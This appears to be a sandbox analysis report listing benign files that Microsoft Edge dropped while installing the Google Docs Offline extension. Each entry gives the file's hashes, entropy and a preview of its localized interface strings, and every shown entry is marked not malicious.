SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
